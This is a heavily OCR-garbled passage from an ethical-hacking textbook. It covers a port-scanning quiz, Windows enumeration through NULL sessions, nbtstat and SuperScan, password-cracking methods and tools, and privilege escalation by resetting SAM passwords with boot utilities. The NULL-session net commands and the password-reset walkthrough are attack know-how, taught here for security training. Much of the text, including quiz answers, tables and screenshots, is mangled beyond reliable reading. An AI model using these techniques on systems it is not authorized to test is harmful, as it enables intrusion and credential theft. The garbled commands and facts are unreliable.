and operating systems identified, the attack moves lo the final sleps, which include mapping the network and analyzing the results. An attacker lhat has obtained in formal ion about services is very close to being able to launch an attack, Asa security professional, your goal is to find these problems and lix them before the hacker can exploit these findings. KEY CONCEPTS AND TERMS Active fingerprinting OS identification Banner Passive fingerprinting Internet Control Message Ping sweep Protocol (ICMP) 1 58 PART 2 A Technical Overview of Hacking Li CHAPTER 6 ASSESSMENT 1. . is a popular I hough easily delectiible scantling technique. A, Full connect II, Half open scanning C. NULL scan D. XttidS Lfte scan 1. Which of the following is the Nmap command line switch for a full connect port scan? A. -sS B. sU C. -sT d. -o 1. Which of the following is an example of a passive fingerprinting tool? A. Superscan B. Xprobc2 C. Nmap 11 pOf 1. TCP and I J DP birth use [lags, A. True \L False 1. Which of the following statements Is most correct/ 1 A. Active fingerprinting tools Inject packets into ilir network. B. Passive fingerprinting tools inject traffic Into the network. C. Nmap can be used for passive fingerprinting. D. Passive fingerprinting tools do not require network traffic to fingerprint an operating system. 1. Which of the following is not a network mapping tool: A. SoLarwinds B. Netstat C. Cheops D. Harris St at 1. l he poim al which an a I Lacker starts to plan his or her attack. A. Active OS fingerprinting B. Passive OS fingerprinting C. Port scanning D. Analyzing the results &. A XMA& tree scan sets all of the following Hags except . A. SYN B. URG C. PSH D. FIN 1. Of the two protocols discussed, which is more difficult to scan for? • You have been asked to perform a port scan for POPS. Which port will you scan for? • A. 22 B. IS C. 69 IX I 10 1 1 . Ping scanning does not identify open ports. A. True B. False 1. The processof determining the underlying version of the system program being used is best described as . A. OS fingerprinting B. Port scanning C. Wardiallng IX Wardrivlng 1 5. Which of the following switches is used for an ACK scan? A. ^sJ B. ^sS C. ^sA 11 -sT Enumeration and ^ Computer System Hacking CHAPTER WITH THE INFORMATION collected up to this point, an attacker has a better picture of what the environment targeted looks like. What the attacker doesn’t know, however, is what the system is actually offering. To determine what a system is offering is the goal of a process of enumeration. Enumeration takes the information that has already been carefully gathered and attempts to extract information about the exact nature of the system itself. Enumeration is the most aggressive of the information gathering processes seen up to this point. Up to this point, information has been gathered without interacting to a high degree with the target In contrast, with enumeration, the target is being interacted with and is returning information to the attacker Information extracted from a target at this point includes usernames r group info, share names, and other details. Once enumeration has been completed, the process of system hacking can begin. In the system hacking phase, the attack has reached its advanced stages in which the attacker starts to use the information gathered from the previous phases to break into or penetrate the system. After the enumeration stage, the attack has begun, and the attacker runs code on the remote system. The attacker is now placing software or other items on a system in an effort to maintain access over the long term. An attacker places backdoors to leave a system open for repeated usage in attacks or other activities as needed. Finally, attackers cover up their tracks to avoid detection and possible countermeasures later. In this last phase, attackers make an effort to eliminate the traces of their attack as completely as possible, leaving few r if any, traces behind. 159 Chapter 7 Topics This chapter covers the following topics and concepts: • What some basics of Windows are • What soine commonly attacked and exploited services are • What enumeration is • What system hacking is • What the types of password cracking are » How attackers use password cracking • How attackers use PsTools • What rootkits are and how attackers use them • How attackers cover their tracks • Chapter 7 Goals When you complete this chapter, you will be able to: • Explain the process of enumeration • Explain the process of system hacking • Explain the process of password cracking • Identify some of the tools used to perform enumeration Understand the significance of privilege escalation • Explain how to perform privilege escalation • Explain the importance of covering tracks • Explain how to cover tracks • Understand the concept of backdoors • Explain how to create backdoors • Windows Basics The Windows operating system can be used as both a stEind alone and a networked operating system , but for the purposes of this chapter you will consider mostly the networked aspects of the operating system (OS), It is important to consider what needs to be secured Eind how to secure the operating system in the networked environment. One of the big issues of securing Windows in the networked environment is the sheer number of features that must be considered and locked down to prevent exploitation. However, before we can determine what to secure, we need to know how Windows works. CHAPTER 7 En time ration and C omputer System Hacking 161 Controlling Access One of the first things that must be understood prior to securing Windows is how access to resources such as file shares and other items is managed. Windows uses a model that can be best summed up as defining who gels access lo what resources. For example, a user gets access to a file share or printer. Always consider what a user account will be used for, because that well dictate what privileges it needs and what ones it doesn’t. For example, if a user will never be performing administrative tasks, don’t give the user administrative access. Users In Hie Windows OS, the fundamental object lhat is used to determine access is the user account. User accounts are used in Windows to access everything from iiles shares to run services that keep the system functioning. In fact, most of the services and processes that run on the Windows operating system run with the help of a user account, but the question is< w r h ich one. Processes in Windows are run under one of four user contexts: • Local Service — A user account with greater access to the local system, but limited access to the network Network Service — A user account with greater access to the network, but limited access to the local system • SYSTEM — A super-user style account that gets nearly unlimited access to the local system and can perform actions on the local system with little or no restriction • Current User — The currently logged-in user who can run applications and tasks, but still is subject to restrictions that other users are not subject to. The restrictions on this account hold true even if the user tic count being used is an Administrator account. Each of these user accounts is used for different specific reasons, and in a typical Windows session each is running different processes behind the scenes to keep the s y stem per form i n g. Prior to the introduction of Windows XP r all system services ran under the SYSTEM account, which allowed all the services to run as designed, but also gave each service more access than it needed. With each service running with what was essentially no restrictions, the potential for widespread harm if a service was compromised was unacceptable. Starting in Windows XP on up to the current version of Windows system, services run under an account with the appropriate level of access lo perform their tasks and none of the extra access that could be a hazard. As will be seen later, this setup limits the amount of damage an attacker could cause if a service were compromised. 1 fyi 162 P A RT 2 A Tech nical Overview of H ack i ng table 7-1 SAM changes in Windows. NAME LAN Manager (LM) NT LAN Manager (NTLM) Kerberos EARLIEST WINDOWS VERSION SUPPORTED Windows for Workgroups Windows NT Windows 2000 DESCRIPTION Considered weak due to the way hashes are created and stored Stronger than LM, but somewhat similar Available with Active Directory NOTE Remember that the SAM is a file that physically resides on the hard drive and is actively accessed while Windows is running. User ei c count information can be physically stored in two locations on a Windows system: in the SAM or in Active Directory. The Security Account Manager (SAM) is a dm abase on the local system that is used to store user account information, By default, the SAM resides within the Windows folder % W IK NT% \sy s tem 3 2 \co n li g\s a m . This is true of all versions of Windows clients or servers. The other method of storing user information is in Active Directory, which is used in larger network environments such as those present in mid- to enterprise-level businesses. For simplicity, this chapter will not discuss Active Directory. Inside the SAM are a few items that should be covered prior to moving forward with other features: namely, some of the storage details that occur here. The SAM stores within it hashed versions of users 1 passwords used to authenticate user accounts; these hashes are stored in a number of different ways depending on the version of Windows, The hash details are listed in Table 7-1 , Groups Groups are used by Windows to grant access to resources and to simplify management Groups are effective administration tools that enable management of multiple users because a group can contain a large number of users that can then be managed as a unit. By using groups, you can assign access to a resource such as a shared folder to a group instead of each user individually, saving substantial time and effort. You can configure your own groups as you see fit on your network and systems, but most vendors such as Microsoft include a number of predefined groups that you can usl- lis well or modify as needed. There are several default groups in Windows, discussed in the following list: • Anonymous Logon — Designed to allow anonymous access to resources: typically used when accessing the Web server or Web applications • Batch — Used to allow batch jobs to run schedule tasks, such as a nightly cleanup job that deletes temporary files CHAPTER7 En time ration and C omputer System Hacking 163 Creator Group — Windows 20(10 uses ihis group to automatically grant access permis- sions to users who are mem hers of the same group(s) eis the creator of a file or a directory. • Creator Owner — The person who created the rile or the directory is a member of this group. Windows 2(JfJ(i uses ihis group Lo a l a : j m a 1 iciiUy iinmi access permissions to the creator of a file or directory. Everyone — Ail interactive, network, dial-up, and authenticated users are members of this group. This group is used to give wide access to a system resource. Interactive — Any user logged on to the local system has the Interactive identity, which allows only locai users to access a resource. • Network — Any user accessing the system through a network has the Network identity, which allows only remote users to access a resource. • Restricted — Users and computers with restricted capabilities have the Restricted identity. On a member server or workstation, a local user who is a member of the Users group {rather than the Power Users group) has this identity. • Self — Refers lo the object itself and allows the object to modify itself • Service — Any service accessing the system has the Service identity, which grants access lo processes being run by Window’s 2000 services. • System — The Windows 2000 operating system has the System identity, which is used when the operating system needs to perform a system-level function, • Terminal Server User — Allows terminal server users to access terminal server applications and to perform other necessary tasks with terminal services So u rce ihttpi/f technet . m krosoft com I en- u h b ra ry fhb/26 9 H 2 . asp x “Si 3 ft in- security identifiers Each user account in Windows has a unique II) assigned to it commonly know r n as a security identifier (SID) that is used to identify the account or group. The SID is a combination of characters that looks like the following: S-l-5-52-1045 537234-129247C)S99 3o6S^27f>719-190(K) Why All the Codes? SIDs may not sound like a good idea, but you need to look at why they are being used instead of the actual usernames. For a moment consider usernames and SIDs to be like a person and his or her phone number, if you were to go to any city in the world, you would find multiple people with the same first name, but it is unlikely that those people would share the same phone number. In Windows, once a SID is used it is never reused, meaning that even rf the user name is the same, Windows doesn’t treat it as the same. By using this setup, an attacker cannot gain access to your files or resources simply by naming their account the same as yours. 164 PART 2 A Technical Overview of Hacking Even though you may use a usernauie to Eiccess the system, Windows identities each user. group, or object by the SID. Tor example. Windows uses the SID to Look up a user account and see whether a password matches. Also, SIDs are used in every situ tit ion in which permissions need to be checked, for exam pie, when a user attempts to access folder or shared resource to determine whether that user is allowed to access it. Commonly Attacked and Exploited Services The Windows OS exposes a tremendous number of services, each of which can be exploited in some way by an attacker. Each service that runs on a system is designed to offer extra features and capabilities to a system and, as such. Windows has a lot of basic services running by default which are supplemented by the ones applications themselves install. Although there are a 11 urn her of services running in Windows, one of the most commonly targeted ones is the NetBIOS service, ivhich uses User Datagram Protocol (UDPj ports 137 and 138 and Transmission Control Protocol (TCP) port 139. NetBIOS litis long been i\ target for al lackers duu Lu it > ease of exploitation and the fact that it is commonly enabled on Windows systems even when it is not needed. NetBIOS was designed to facilitate communications between applications in local area net work but is now considered to be a legacy service and usually can be disabled. In the Windows OS, the NetBIOS service can be used by an a tt ticker to discover information about a system. Information that can be obtained via the service is very diverse and includes user na 111 es h share names* service information, among other things. In the enumeration phase, we will see how r to obtain this information using something known as a NULL session. Once port scanning has been performed, it is time to dig deeper into the target system itself to determine what specifically is available. Enumeration represents a more aggressive step in the hacking and penetration testing process because the attacker has now started to access the system to see specifically what is available. All the steps lead i tig up to this point have been aimed at gaining information about the target to discover the vulnerabilities that exist and how the network is configured, When enumeration is performed, the process is now at temp Ling to discover what is offered by these services for later usage in actual system hacking. When performing enumeration, the attacker has the goal of uncovering specific information about the system itself. During a typical enumeration process an attacker will make active connections to the target system to discover items such as user accounts, share names, groups, and other information that may be available via the services discovered previously. It is not uncommon during this phase of the attack to confirm NOTE In reality, any service can be a potential target; it all depends on the knowledge and skill of the attacker. However, some services are much more Itkely to be attacked than others, and NetBIOS fits the profile of a service that is commonly selected for attack. Enumeration CHAPTER7 En time ration and C omputer System Hacking 165 Is it Legal? A case can be made that enumeration represents the point at which hacking really starts, beca use the target is now being actively accessed. The steps leading up to enumeration have different levels of interaction with the target, but none of them seeks to actively extract information from the target as enumeration does. Enumeration has gone beyond actively probing a target to see what operating system it may be running to determining specific configuration details. Enumeration can be said to be the point where the line has been crossed, with the activities from this point on becoming illegal. information that was discovered earlier information that the intended target may have even made publicly available such as Domain Name System (DNS) settings. During this process, however, new details will emerge that the victim did not make available; otherwise, details that tend to appear at this point include the following: • User accounts t]roup sel i in ■ Group membership • Application settings • Service banners Audit settings • Other service settings • NULL Session The NULL session is a feature in the Windows operating system that is used to give access to certain types of information across the network. NULL sessions are a feature that has been a part of Windows lor some time — one that is used to gain access to parts of the system in ways which are both useful and insecure. A NULL session occurs when a user attempts a connection to a Windows system without the standard user name and password being provided. This connection type cannot be made to any Windows share, but ii can be made to a feature known as J In addition to determining what services and settings are present, the enumeration ph. els e also can employ techniques used to determine the placement and capabilities of countermeasures. An attacker can use enumeration methods to get a picture of whether or how a target can respond to system hacking activities. By uncovering information on whether or how a defender can respond will allow the attacker to modify their attack accordingly lo make their activity more productive. The more information an attacker can gather, the more accurate the attack can be. With enough information about a target, an attacker can move from a “shotgun ” style attack to an attack similar to what a sniper would carry out. 166 PART 2 A Technical Overview of Hacking the Interprocess Communication (IPC) administrative share. In normal practice, NULL sessions Eire designed to facilitate connection between systems on a network to allow one system to enumerate the process and shares on another I -sing a NULL session it is possible to obtain information such eis the following: • List of users and groups • List of machines ■ List of shares • Users and host SIDs • The NULL session allows access to a system using a special account known as a NULL use]’ that can be used to reveai information tibout system shares or user accounts white not requiring a use ma me or password to do so, Exploiting a NULL session is a simple task that requires only a short list of commands. For example, assume that a computer has the name “‘ninja 1 ‘ as the host name, which would mean that the system could be attached to using the following, where host is the Internet Protocol (IP) address or name of the system being targeted.: net use \ninja\ipc$ M ” /user:””

To view the shared folders on the system the following
command can be used:

Net view Wninja

If shared resources are available, they will be displayed
as a list, at which point the attacker can attach to a shared
resource as follows:

Net use s: \ninja(shaied folder name)

At this point, the attacker can browse the contents of the
shared folder and see what data is present.

f > NOTE

NULL sessions may sound like
a bad idea, but they are very
handy when used properly. In
practice, the Windows operating
to this account that are not
needed to use the account for its
intended function. As a security
how the sessions are used will
help in securing them.

Oversharing?

Remember that on the Windows operating system shared folders give access to the Everyone
group by default. If the Everyone group is given default access to a folder and this is not
changed, it creates a situation in which attackers can easily browse the contents of the folder
because they will be part of the Everyone group by default. Prior to Windows 2003, the
Everyone group was granted full controls of a folder. From Windows 2003 on, the Everyone
group is given read-only access, in either situation, it is possible for an attacker to at least view
the contents of a folder, and in the case of full control, do much worse.

CHAPTER? Enurne ration a nd Computer System Hacking

167

TABLE 7-2

Partial list of nbtstat switches.

SWITCH

NAME

FUNCTION

■-a

R”p1″i irnQ thp Mp^RIO – ^ n pi rn p i – zi h 1 p zinrl m Anrl Alrirv

P.CLU 1 1 l_> L 1 1 C 1 1 tT ID 1 K_|T J I lal lit L EJ U I EI Ol IU 1 1 1 a 1 lUaLUI y

for the computer name specified

-A

Lists the same information as -a when given

-c

Cache

Lists the contents of the NetBIOS name cache

-n

1 * u 1 1 1 ET j

rii^nl^w^ thp n.amp^ rpn i^tp tp H lor^illv Kv Mp+ R] n^I

1 J lay j Lf ICT 1 lu 1 1 1 CT j 1 UUIjiCI CU IULGIIV UV HC LLJI S_/ J

applications such as the server and redirector

_r
I

H o ck -1 ! Eva H

Plicnlrnjc 3 f~r\i y n+ ^nt 1 1 n_rrri*>c–c rijcn K i – c< H l~iu
L> 1 j jk^lcJy j a LUU.I1 L Ul all rldlfltri [trat/iVCLJ L/y

broadcast or Windows Internet Name Service
(WINS) server

-s

Sessions

Lists the NetBIOS sessions table converting desti-
nation IP addresses to computer NetBIOS names

-S

Sessions

Lists the current NetBIOS sessions and their

t

ra
n

Working with Nbtstat

An additional tool that can be used in the enumeration process is a tool known as nbtstat.
Included with every version of the Windows operating system, nbtstat is a utility intended
to assist in network troubleshooting and maintenance. The utility is specifically designed
to troubleshoot name resolution issues that are a result of the NetBIOS service. During
normal operation, a service in Windows known as NetEIO L S over TCP/IP will resolve
names known as NetBIOS names to IP addresses. Nbtstat is a command line utility
designed to locate problems with this service,

Nbtstat has a number of switches that can be used to perform different functions; some
of the more useful functions for the ethical hacker are listed in Table 7-2.

The -A switch can be used to return a list of addresses and NetBIOS mimes ihe system
has resolved. The command tine that uses this option would look like the following if the

nbtstat -A 192. 1GS. 1 . 1

SuperScan

SuperScan is a tool that was used back in Chapter h to perform port scanning, but can
also perform enumeration. On Lop ol SuperSeaji’s previously mentioned a Minks to scan
TCP and 1 1 DP ports h perform ping scans, run whois and tracert it also has a formidable
suite of features designed to query a system and return useful information.

1 68 PART 2 A Technical Overview of Hacking

IP

FIGURE 7-t

SuperS can.

SuperSenn offers a number oJ useful enumeration ul ilit ies dusiLUU’d lor eunu’lmii
information from a Windows-based host:

• NetBiOS Name Table
• MILL session

• Workstation type

• Users

• Groups

• Remote procedure call I RFC) endpoint dump

• Account policies

• Shares

• Domains

• Logon sessions

• Trusted domains

• Services

• Each of these features can extract information from a system that can he useful
in later stages of the hacking process,

CHAPTER7 En time ration and C omputer System Hacking

169

SIMScan

SNScan is a utility designed to deled Simple Network Management Protocol (SNMP)-

e nab led devices on a network. The utility is designed to locate and identify devices that
are vulnerable to SNMP attacks. SNScan scans specific ports (for example. IJDP 161, 193.
391. and 199 3) and looks for the use of standard (public and private) and user-defined
SNMP community names. User-defined community names may be used to more effectively
evaluate the presence of SNMP- enabled devices in more complex networks.

Enumeration is designed to gather useful information about a system: specifically what
can be accessed through a discovered service. By using the process of enumeration, an
attacker can obtain information that may not otherwise be available such as user names,
share names, and other details, Enumeration represents the point at which the attack
crosses the legal line to being an illegal activity in some areas.

System Hacking

After an attacker has performed enumeration, he or she can begin attacking the system.
Enumeration has provided details that are actionable for the next phase of system
hacking, including details of user accounts and groups. The information on usernames
and groups provides points on the target system on which to concentrate the system
hacking activities. Up to this point, progressively more detailed information has been
gathered and what those services are offering has been determined: now the process
of exploiting what has been uncovered can begin.

During the enumeration phase, among the detailed information that was acquired
was usernames. The information on user accounts provides the system hacking process
a point to focus on using a technique known as password cracking. Password cracking
is used to obtain the credentials of an account with the intent of using the information

To understand why password cracking is successful, think of how and why passwords
are used. Passwords are designed to be something that an individual can easily remember
and at the same time not be something easily guessed. Herein lies the problem. In practice,
individuals wilt tend to use passwords that are easy to guess or susceptible to cracking
methods such as those introduced in this section. Some examples of passwords that lend
themselves to cracking include the following:

• Pa ss wo rd s t h at use on ly n u m bers

• Pa ss wo rds th at use on ly le tters

• Passwords that are only upper- or lowercase
• Passwords that use proper names

• • Pa ss wo rd s t h at u se d ictio n ary wo rd s

• Short passwords (fewer than eight characters)

Passwords that adhere closely to any of the points on this list lend themselves to quick and
easy password cracking methods. Passwords that avoid any of these points tend to be less
easy to crack, but not impossible, as the techniques discussed in this section will demonstrate.

170

PART 2 A Technical Overview of Hacking

Despite what is seen in movies, TV shows, and other media, password cracking isn’t
as simple as a hacker sitting in front of a computer running some software and breaking
the password. It is much more involved. Password cracking can take one of four forms,
all designed to obtain a password that the attacker is not authorized to possess. The
following are the four password cracking methods that can be utilized by an attacker:

• Passive online attacks
• Active online attacks

• Online tit tacks

• Nontechnical attacks

• Each one of these attacks offers a way of obtaining a pas sword from an unsuspecting
party in a different but effective way.

Passive Online Attacks

In passive online attacks, an attacker obtains a password simply by listening for it. This
attack can be carried out using two methods: packet sniffing, or man-in-the-middle and
replay attacks. These types of attacks are successful if the attacker is willing to be patient
and employ the right techn ique in the correct environment.

Using a packet sniffer is effective, but it can be thwarted by technology that prevents
the observation of network I r el Hie. Sped lie ally, packet sniffing will work only if the hosts
are on the same collision domain. This is a condition that exists If a hub is used to join
the network hosts together: if a switch, bridge, or other type of device is used, the attack
will fail.

Other types of passive online attacks utilize a man-in-the-middle or replay attack
to capture the password of the target. If a man-in-the-middle attack is used, the attacker
must capture traffic from both ends of the communication between two hosts with the
intention of capturing and altering the traffic in transit. In a replay attack, the process
consists of an attacker capturing traffic using a sniffer, using some process to extract
the desired information [in this case, the password), and then using or replaying it later

While a packet sniffer may have limited success when trying to capture passwords on most
networks, companies do tend to frown upon their use by unauthorized individuals. An individual
that runs a packet sniffer on a corporate network has a possibility of capturing a password, not
to mention other confidential information. It is for these reasons that companies tend to take a
very tough stance on their usage, and in some cases have terminated employment of individuals
caught using them on the network without permission.

3

CHAPTER7 En time ration and C omputer System Hacking

171

Dictionary attacks are Successful when users are allowed to choose passwords without any
restrictions being placed upon them. Evidence has shown that individuals will choose passwords
that are common names or words if allowed to do so, and it is in these cases that dictionary
attacks thrive. The enforcement of complex passwords that introduce upper- and lowercase
letters as well as numbers and special characters tends to limit the success of dictionary attacks.

Active Online Attacks

The next form of attack is known as tin active online attack,
which consists of more aggressive method?; such as brute- force
and dictionary attacks, Active online attacks are effective in
situations in which the target system has weak or poorly chosen
passwords in use. In such cases, active online attacks can crack

The first type of active online attack is the brute -force attEick,
which is unsophisticated but can be very effective in the right
situation. In this type of attack, all possible combinations of
characters are tried until the correct combination is discovered.
Given enough time, this type of attack will be successful 100
percent of the time; however, that is also part of the problem —
having enough time,

A dictionary attack shares some traits with the brute-force attack. Whereas
a brute-force attack attempts all combinations of characters, the dictionary attack
tries passwords that are pulled from a predefined list of words. Dictionary attacks are
particularly successful in situations in which the passwords in use on a system have
been chosen or can be chosen from common words. This type of attack is successful
even if the password is a reversed form of a dictionary word, changes certain characters,
or even uses tactics such as appending digits to the end of the word. These types of attacks
are easy to carry out by an attacker largely due to the availability of the components
to perform them, such as password crackers and predefined word lists that can be

Offline Attacks

Offline al lacks are a form of password attack that relies on weaknesses in how passwords
are stored on a system. The previous attack types attempted to gain access to a password by
capturing it or trying to break it directly: offline attacks go after passwords where they happen
to be stored on a system. On most systems, a list of usernames and passwords is stored in some
location: if these lists are stored in a plaintext or unencrypted format, an attacker can read
the file and gain the credentials. If the list is encrypted or protected, the question becomes
“‘How is it protected?” If the list is using weak encryption methods, it can still be vulnerable.

NOTE

Brute-force attacks, although
effective, are thwarted by
preventive techniques such as
policies that lock user accounts
incorrectly a preset number
of times. When policies are
in effect that limit unsuccessful
logon attempts before locking
an account, the effectiveness of a
brute-force attack is diminished.

172 PART 2 A Technical Overview of Hacking

Passwords used to grant access to a system are generally stored in a database on a system
in which they can be accessed to validate the identity of a user. Due to its very nature,
a database can store quite a number of passwords, each providing the ability to grant
some sort of access to the system, so the confidentiality and integrity of these items must
be preserved. Twrs ways to protect these valuable credentials are encryption and hashing.
Encryption provides a barrier against unauthorized disclosure, while hashing ensures the
integrity of these credentials.. When users attempt to log on to the system, they provide
their credentials in the form of user name and password, but the password is hashed.
Because the database on the system already has a hashed form of the user’s password
on file, a comparison is made. If the comparison between what the user provides and
what is on file matches, the use is authenticated; if not, they are denied access.

While the hashing method is known to both parties and can be discovered with some
work by an attacker, it does not tell them what a password is because they would still have
to reverse the hash {which is designed to be infeasible). However, the attacker can apply
the same hashing function to different character combinations in an attempt to reveal an
identical hash. The rate at which this can be performed varies depending largely on the
hashing function used, but in some cases this process can be performed quite rapidly —
which can allow the plaintext password to be recovered easily.

The process discussed in this section relies on this process to recover passwords.

Four types of offline attacks are available to the attacker, each offering a method
that can be used to obtEiin passwords from a target system. The types of oflline attacks
available include the two mentioned previously (dictionary and brute-force attacks),
and ei I so hybrid and precnmputed attacks.

Examples of password crackers in this category include:

Cain and Abel — lias the ability to crack password hashes offline.
Works with Windows, Cisco , VNS> and other similar passwords.

John the Ripper — Cracks UNIX and Windows passwords

• Pandora — Designed to crack Novell passwords

Pwdump3 — Extracts passwords from the .SAM database

Dictionary Attacks

Dictionary attacks are similar to active online attacks in that all possible combinations
are tried until the correct combination is discovered. The difference between this type
of attack and the active online version is how the correct combination is uncovered.
In this method, an att ticker reEids the list of passwords looking for hashes that match

CHAPTER 7 En time ration and C omputer System Hacking

173

A method of thwarting hashes that is used by many systems such as UNIX is a technique
known as salting. When you use salting, you add extra characters to a password prior
to hashing. This has the effect of changing the hash, but not the password. Attackers who
recovers the list of hashes from the system will have a much harder time recovering the
passwords because they would have to determine the password by reversing the hash
or determining the text used to generate it.

the hashed values of words in the dictionary. If the attacker finds a match between
the hashed values on the system and the hashed values from a dictionary or word list,
he or she has found the correct password.

Hybrid Attacks

Hybrid attacks are another form of offline a I tack that functions much like die I in nary
attacks, but with an extra level of sophistication. I [ybrid attacks start out like a dictionary
attack > in which different combinations of words from the dictionary are attempted:
if this is unsuccessful at uncovering the password, the process changes. In the next phase
of the attack, characters and symbols are added to the combinations of characters to
□it tempt to reveal the password. The attack is designed to be fast and thwart the incorrect
or improper use of salting.

Brute- Force Attacks

Brute-force attacks function like online attacks because they attempt all possible
combinations or a suspected subset of possible passwords. Brute force has the benefit
of always working, but the downside is that it takes a long time. Typically* this method
starts using simple combinations of characters and then increases com plexity until

Examples of brute- force password crackers include:

• Opcrack

(ZZZD-

Given enough time (possibly years’), brute-force attacks will succeed, but the issue becomes
whether the attackers have enough time before they are detected. Brute-force methods of
any type can take substantial periods of time depending on the complexity of the password,
password length, and processor power of the system attempting the break in. Attackers run the
risk that if they take too long to break a password, they will be detected by the system owner,
at which point the attack will have failed.

174 PART 2 A Technical Overview of Hacking

Precompiled Hashes

P recomputed hashes Eire used in an attack type known as a rainbow table. Rainbow
tables compute every possible combination of characters prior to capturing a password.
Once all the passwords have been generated, the attacker can then capture the password
hash from the network and compare it with ihe hashes that have already been generated.
With all the hashes generated ahead of time, it becomes a simple matter to compare
the captured hash to the ones generated, typically revealing ihe password within
a few moments.

Of course, there’s no getting something for nothing,
and the case of rainbow tables is no exception. The downside
of rainbow tables is that they take time. It takes a substantial
period of time sometimes days, to compute all the hash
combinations ahead of time, Another downside of rainbow
tables is the lack of ability to crack passwords of tin limited
length because generating passwords of inereEising length
lakes increasing amounts of time.

Examples of password crackers that use rainbow
tables include:

• Opcrack
• RainbowCrack

• Nontechnical Attacks

The last of the password cracking methods is a family of techniques that obtain passwords
using nontechnical methods. In some cases, an attacker may choose to use nontechnical
methods due to the conditions in the environment or just because it is easier. The nontech-
nical methods represent a change over previous attEicks; where previous attacks relied on
attacking the technology, nontechnical methods go after the human who uses the system.
In the right hands, nontechnical methods can be as effective as technical methods at

Shoulder Surfing

Shoulder surfing is a method of obtaining a password by observing people entering
takes a position to see what a user is typing or what is appearing onscreen. Additionally,
the Eittacker may also look for clues in the user’s movements that suggest they are looking
up a password such as on a Post-It note or other location. To deter this attack, use the
privacy screen that can be put onscreen and always pay attention to your surroundings
to see whether anyone is w r atching.

NOTE

Rainbow tables are an effective
but the effectiveness of the
method can be diminished through
salting. Salting is used in Linux,
UNIX, and BSD r but is not used
in some of the older Windows
authentication mechanisms such
as LM and NTLM.

CHAPTER 7 En time ration and C omputer System Hacking

175

Keyboard Sniffing

Keyboard snifling intercepts the password as a user is entering it This attack can
be carried out when users are the victims of keylogging software or if they regularly
log onto systems remotely without using any protection.

Social Engineering

Social engineering methods can be used to obtain a password based on trust or ignorance
on the user’s end. Tor example, a password may be obtained by an attacker calling an
Social engineering is effective because users tend to be trusting: if an individual sounds
or acts legitimate, the feeling is that he or she probably is.

Using any of the methods discussed here with any type of password cracking software
may sound easy, but there is one item to consider: whose password to crack? Going back
to the enumeration phase, it was discussed that usernames could be extracted from the
system using any one of a number of software packages or methods. Using these software
tools, usernames were uncovered and at this point the attacker could target a specific
account without the password cracking tool of choice.

So which password to crack? Accounts such as the administrator account are targets
of opportunity, but so are lower-level accounts such as guest that may not be as heavily
defended nor even considered in security planning.

Privilege Escalation

If a password is cracked, the probability of the account being one that has high level
access is somewhat low because these types of accounts tend to be well defended.
If a lower-level account is cracked, the next step is privilege escalation: to escalate
the privileges to a level at which increased access and fewer restrictions are in place
such as with the administrator account.

Out of Sight, Out of Mind

Every operating system ships with a number of user accounts and groups already present.
In Windows, users who are already configured include the administrator and guest
accounts. Because it is easy for an attacker to find information on the accounts that are
included with an operating system, care should be taken to ensure that such accounts
are secured properly, even if they will never be used. An attacker who knows that these
accounts exist on a system is more than likely to try to obtain the passwords of each.

176 PART 2 A Technical Overview of Hacking

Stopping Privilege Escalation

A number of methods can be used to blunt the impact of privilege escalation such as
the concept known as least privilege. The thinking behind this concept is to limit the
amount of access an account has to just what is needed to perform its assigned duties.
For example, a user account given to someone in sales would be able to only perform
the tasks required by a salesperson to do the job. It is in this way that the actions that
an account can perform are limited, preventing inadvertent or accidental damage

One way to escalate privileges is to identify an account that has the access desired
and then change the password. There are several tools that offer this ability, including
the following:

• Trinity Rescue Kit

• ER D Com in an de r

• Recovery Console

These utilities function by altering the SAM with the goal of resetting passwords
and accounts to settings desired by the attacker.

• Re-enable accounts
• Unlock an account

• Reset expiration on an account

• Display all local users on a system

• To change a password using Active @. select a specific user account to view r the account
information, as seen in Figure 7-2.

To view and change permitted logon days and hours, press the [PgDn] key, as seen
in Figure 7-3.

The designers of Active® desig ned
it to prevent the lengthy process
of reinstalling operating systems

as is the case with any tool, it can
be used for good or bad. It all

The Active® Password Changer is a utility that is used
to perform multiple functions on user accounts including
of a targeted user account to a password that the attacker
chooses to set. To use this utility requires the attacker to gain
physical access to a system t at which point the system can
be rebooted from a universal serial bus (USB), floppy, or CD.

depends on the user’s intent.

Active@ has the advantage of being able not only to reset

CHAPTER 7 En ume ration and C omputer System Hacking

177

flctiuefJ Password Changer u„3.fl (build BZ77 3
User’s Recount parflfieters :
NS SflH Oat abuse: C6 3 (i*<UIK2K>sH]NHTsSVSTEh32^0MFIG\sftH
Fu ] ! Hriw : “Kara line White”

Hescrlpt inn ; “HetiJOT’k s^jfi^rhs rnrj ineer (IT BepartHent V
Exist iitg : Change t n \

13 [ 1 User Must change passuard at next logon

[1 [ 1 Account Is disabled

13 II Account Is Locked uul

IX] Clear this U s ur ” ^ Password

PgDn to vSew oiv and c hangs per Hit tod logon hours

Press V to save changes and exit cr Esc tu exit without saying

1999-2805 ( C ) Active Data Recovery Software www. password-changer, coh

FIGURE 7-2

Viewing account
information.

Select and choose days and hours to allow logons. Account logon hours are displayed
in GMT (Greenwich Mean Time}. The time will have to be adjusted for the local time zone
where the system resides or for the time zone set on the system,

Press [Y] to save changes or press [Esc] to leave the previous account information
unchanged and return to previous window (List of accounts). See Figure 7-4,

Resetting a user’s password results in the following;

• The user’s password is set to blank.

• The account is enabled.

■ The password will be set never to expire.

FIGURE 7-3

Changing logon days
and times.

fictiuetf Password Chauffer u.l.B ( build B277 )
User’s Recount paraweters :
NS SAM Database: ceMl><U1W2R>sH]HHTsSYSTEW32vC0HFlG\saH

Pnrnltted Logon Hours (GMT)
6 1 2 3 4 5 6 7 B 9 IB 11 12 13 tl 15 IB 17 IB IS £1 7\ 7? 23

su rx/i rxi rxnxi rxtr it It JI II II 31 It It HXnxirxi rxi ixnxirxi rxi rxiExi

Ho EX! IX) I It 31 )I 11 31 3t 31 3E It 31 )t It 31 )t 3t 1 1 31 11 It 31 3EX1

Tu EX3IXHX1IX3I )I II 31 II 31 31 II 31 )I II 31 )I IE JI 31 31 II 31 1EX1

He EX] IX 3 1X1 IX] I 31 II 31 ]I 31 31 ] I 31 31 II 31 )I 3E ]I 31 JI J I 31 11X1

Tli [X] EX1 1X1 IX] I II II 31 ] I 31 II ] I II 31 II 31 )I IE ]I 31 31 II 31 11X1

Fr IX] 1X3 1X3 1X3 1 31 II 31 ] I 31 31 ] I 31 )I 31 31 )I )E ]I 31 II 3t 31 11X1

